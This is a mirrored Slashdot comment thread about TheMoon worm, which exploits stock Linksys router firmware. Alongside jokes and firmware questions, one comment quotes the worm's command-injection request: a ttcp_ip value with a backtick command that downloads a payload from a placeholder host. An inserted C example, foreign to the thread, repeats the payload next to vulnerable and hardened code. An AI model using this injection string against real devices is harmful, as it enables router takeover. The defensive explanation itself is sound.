Slashdot Mirror


Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

30 of 134 comments

  1. That's impossible by CajunArson · · Score: 5, Funny

    Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

    This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

    Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

    In conclusion, Windows is the cause of all security problems.

    --
    AntiFA: An abbreviation for Anti First Amendment.
    1. Re: That's impossible by Anonymous Coward · · Score: 5, Informative

      Slow your roll there, not all Linksys run Linux. Most run VxWorks RTOS. Only the Linksys routers flashed with DD-WRT firmware run Linux for sure.

    2. Re:That's impossible by Narcocide · · Score: 5, Informative

      Only affecting models not running Linux currently...

    3. Re:That's impossible by Anonymous Coward · · Score: 2, Funny

      Also, Linksys is owned by Cisco. Cisco makes IOS for their routers. iOS is on iPhones. iPhones have never had a worm like this.

      Ipso facto, this is unpossible

    4. Re:That's impossible by gnick · · Score: 2

      I tried to turn mine off, but it bit me! I tried throwing Androids at it, but zombies started flowing out of the Apple store to defend it!

      --
      He's getting rather old, but he's a good mouse.
    5. Re:That's impossible by X0563511 · · Score: 3, Insightful

      Last I checked VxWorks is not Linux...

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    6. Re:That's impossible by FuegoFuerte · · Score: 3, Informative

      As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

      I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?

      Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.

    7. Re: That's impossible by Mashiki · · Score: 2

      Odd, I run tomato. Which is also 'nix, so saying that ddwrt is the only way for sure isn't true.

      --
      Om, nomnomnom...
    8. Re: That's impossible by tech.kyle · · Score: 2

      I believe you're picking nits slightly. Regardless, you're totally right and the above AC is technically wrong. There are a good number of alternative router OSes available, many of which run *nix.

      --
      If we colonize Mars, it won't be the World Wide Web anymore. UWW?
    9. Re:That's impossible by tech.kyle · · Score: 2

      Just because some of their routers run *nix doesn't mean the software Linksys put on it is flawless. Doesn't matter what it's running if their grubby little hands were all over it.

      --
      If we colonize Mars, it won't be the World Wide Web anymore. UWW?
  2. 56k Connections are still less safe by BisuDagger · · Score: 2

    I heard if you have a 56k connection that the NSA can listen to your internet.

  3. Network company supplied routers vul'n by RichMan · · Score: 4, Insightful

    Use this supplied router. Do NOT modify it.

    But it has admin/admin as user name and password and is 192.168.1.1
    Can I fix that?

    Do NOT modify the settings on the supplied router.

    *facepalm*

    1. Re:Network company supplied routers vul'n by SJHillman · · Score: 2

      My ex-girlfriend's parents had a wireless router like that... both the wireless and web interface had default settings that they weren't supposed to change. And it gets better. Administration from the WAN side was enabled (supposedly for support). Yes, with the default UN/PW. Only Frontier could make TWC look somewhat competent.

  4. Model Numbers of affected devices. by Anonymous Coward · · Score: 5, Informative

    Here is a list of router models mentioned in the binary:
    E4200
    E3200
    E3000
    E2500
    E2100L
    E2000
    E1550
    E1500
    E1200
    E1000
    E900

  5. Is dd-wrt affected? by satuon · · Score: 2

    I have a Linksys router with dd-wrt, would it be affected?

    1. Re:Is dd-wrt affected? by CreamyG31337 · · Score: 4, Informative

      no, it's just the default firmware.
      "Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
      from the comments on https://isc.sans.edu/forums/di...

  6. Default firmware only? by allcoolnameswheretak · · Score: 2

    Does this also apply to LinkSys Routers that have been Tomatoed?

    1. Re:Default firmware only? by SJHillman · · Score: 3, Funny

      No, but it does affect routers that have smiley face stickers applied to the top or sides.

    2. Re:Default firmware only? by Lothsahn · · Score: 4, Informative

      I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

      The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi` &StartEPI=1

      It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

      --
      -=Lothsahn=-
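To make the mechanism Lothsahn describes concrete, here is an added C example (my own, not the worm's code and not Linksys firmware): the vulnerable pattern of pasting the ttcp_ip field into a shell command line, beside a hardened version that accepts only a strict IPv4 literal and builds an argv for execv()-style spawning so no shell ever sees the value. The ttcp command name and its -t flag are assumptions; the ttcp_ip value is the one quoted in the comment, with its "[source IP]" placeholder kept as-is.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The ttcp_ip value quoted in the comment above. "[source IP]" is the
 * thread's own placeholder, not a real address. */
#define THEMOON_TTCP_IP \
    "-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`"

/* Vulnerable pattern as the comment describes it: the form field is pasted
 * into a shell command line, so a shell would interpret the backticks and ';'
 * and run the field's contents as commands. This only builds the string and
 * never executes it; returns 1 if the result fit in the buffer. */
int build_ttcp_cmd_unsafe(const char *ttcp_ip, char *out, size_t outlen) {
    int n = snprintf(out, outlen, "ttcp -t %s", ttcp_ip);
    return n >= 0 && (size_t)n < outlen;
}

/* Hardened input check: accept only a strict dotted-quad IPv4 literal (four
 * 0-255 octets, no leading zeros, nothing else). Shell metacharacters, spaces
 * and option-looking values such as "-h" are all rejected. */
int is_strict_ipv4(const char *s) {
    int octets = 0;
    while (*s) {
        int val = 0, digits = 0;
        while (isdigit((unsigned char)*s)) {
            if (digits == 3 || (digits > 0 && val == 0)) return 0;
            val = val * 10 + (*s++ - '0');
            digits++;
        }
        if (digits == 0 || val > 255) return 0;
        octets++;
        if (*s == '.' && s[1]) s++;         /* separator needs a next octet */
        else if (*s) return 0;              /* anything else is invalid */
    }
    return octets == 4;
}

/* Hardened launch: validate first, then hand ttcp an argv for execv()-style
 * spawning so no shell parses the value. Returns 1 on success; on failure
 * argv[0] is NULL and nothing should be executed. */
int build_ttcp_argv_safe(const char *ttcp_ip, const char *argv[4]) {
    argv[0] = NULL;
    if (!is_strict_ipv4(ttcp_ip)) return 0;
    argv[0] = "ttcp"; argv[1] = "-t"; argv[2] = ttcp_ip; argv[3] = NULL;
    return 1;
}
```

The unsafe builder passes the backtick payload through untouched, which is exactly why a validation step plus a shell-free launch is the fix rather than escaping.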
  7. Actually Belkin bought them from Cisco by fullmetal55 · · Score: 4, Informative

    Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

    and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

    1. Re:Actually Belkin bought them from Cisco by DigiShaman · · Score: 2

      "I can't get online. Is the internet down again?"

      "Did you forget to reboot the router - again?!"

      Have no fear. Belkin is here! With this new firmware reboots are scheduled automatically! ***applause***
      Now the entire family is happy again.

      --
      Life is not for the lazy.
    2. Re: Actually Belkin bought them from Cisco by tragedy · · Score: 2

      Think it's stupid in routers? Patriot missile systems used to have a timing bug that would reduce accuracy the longer the unit was in operation. The bug was that the time in seconds since initialization was being converted from an int to a float and divided by 10, causing precision to go down as the time value went up. The inaccuracy was pronounced after 8 hours of continuous operation and the workaround was to restart the unit frequently (actually, it was apparently to assume that the units would be restarted frequently). As a result a unit that had been operating for 100+ hours failed to track an incoming scud missile and there were 126 US Army casualties (28 fatalities). That's the kind of software bug you can get worked up about! It is worth noting that they did actually patch it, and the patch was actually available before that incident, but had not yet been applied to that particular unit.

  8. It wasn't Trolling by Anonymous Coward · · Score: 5, Insightful

    Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeing the source!"

    The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

    Also, I took the GP's comment as a little teasing at the expense of some of the rabid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

    I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

  9. Dodged that bullet by Mike Van Pelt · · Score: 2

    I'm sure glad I installed DDWRT on my E3000 about a year ago.

  10. TheMoon by confused one · · Score: 5, Funny

    Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

  11. Why is the admin port open to the public? by EMG at MU · · Score: 5, Insightful

    The web administration port should not be open to the public internet by default on these routers.

  12. pronunciation by dkman · · Score: 3, Insightful

    Vixin Licks? just sayin'

    --
    I refuse to sign
  13. Re:how can i tell if my router is affected? by Anonymous Coward · · Score: 3, Funny

    There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

  14. You got the correct message by CajunArson · · Score: 2

    I'm glad you got the satire... I've been running Linux on any machine under my direct control since 2000 and I did my Master's thesis by hacking on a Linux Security Module for domain & type enforcement back when the 2.6 Kernel was still in beta... so I'm not exactly shilling for Microsoft.

    I'm also not a fan of complacency. While I really like that a whole lot of devices run Linux, if they can't be updated to address security issues in a very easy (even completely automated) manner, then Linux can be just as vulnerable as Windows or anything else.

    --
    AntiFA: An abbreviation for Anti First Amendment.
    1. Re:You got the correct message by SQLGuru · · Score: 2

      Yay for common sense (both you and Anonymous above). I run Windows....I have nothing against Linux, but working in Windows pays the bills. I patch regularly, I browse intelligently....and I haven't had a virus on *MY* machine since the Ping-Pong virus back in the DOS days.........(that was a cool virus, BTW).

      Open Source isn't a cure-all. Neither is Closed Source. User behavior and knowledge is the best cure-all.